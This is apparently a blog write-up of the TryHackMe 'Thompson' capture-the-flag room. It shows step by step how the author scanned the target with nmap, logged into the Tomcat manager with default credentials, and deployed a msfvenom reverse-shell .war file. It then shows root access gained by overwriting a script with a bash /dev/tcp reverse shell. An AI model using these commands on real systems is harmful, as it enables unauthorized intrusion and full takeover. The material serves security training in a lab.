Thompson
- https://tryhackme.com/room/bsidesgtthompson
Recon
So we start off as we normally do with a quick NMAP scan of our target
sudo nmap -vv -sV -Pn <Target IP>
With the results of the scan we can see that there is a web-server running Tomcat 8.5.5 on port 8080
So if we head over to <Target IP>:8080 we are greeted with the default home page for tomcat.
From here since I am dealing with a webpage I decide to view the page source for any comments or anything left behind that could be useful.
I am unable to find any comments or anything of that nature so I head over to the manger/html.
Upon clicking the link either on the homepage or within the page source you will be greeted by a login prompt. We obviously don't have the credentials right now so I hit cancel. I am redirected to the source page of the manger/html where I can find the default login credentials.
I can see once I am logged into the manager portal I can upload a .war file.
Reverse Shell
So I create the reverse shell payload with msfvenom and upload it to the server
msfvenom -p java/jsp_shell_reverse_tcp lhost=<Your IP> lport=<port you want to listen on> -f war -o <nameoffile.war>
From here we have our malicious file uploaded and can set up our listener
nc -lvnp <port you want to listen on>
Activate your .war file by clicking the activating it in the applications table
We now have our shell
Stabilize your shell
Lets stabilize our shell to improve our quality of life
python -c 'import pty;pty.spawn("/bin/bash")'
cntrl + z
stty raw -echo ; fg
export TERM=xterm
User flag
Lets do a search for the first flag we know its called user.txt.
find / -type f -name user.txt 2>/dev/null
cat /home/jack/user.txt and you have your first flag
Root flag
Along with the user.txt file we find two other files a id.sh and a test.txt file. After looking viewing the results from each we can see that the id.sh file is a bash script sending its output to the test.txt file. Meaning we can poison that script to give us a root shell or just the root flag I will go over how to do both. I will start with just getting the root flag since that will complete the room and getting complete root control isn't necessary for this.
echo "cat /root/root.txt > test.txt" > id.sh
cat test.txt and you will have the root flag
Root Shell
To obtain a root shell it is the same concept as getting the id.sh file to send the cat command to the test.txt file. Instead we do it with bash command for a shell.
echo "bash -i >& /dev/tcp/<Your IP>/<listener port> 0>&1" > id.sh
Now set up another listener and wait a moment and you have a shell as root
No comments:
Post a Comment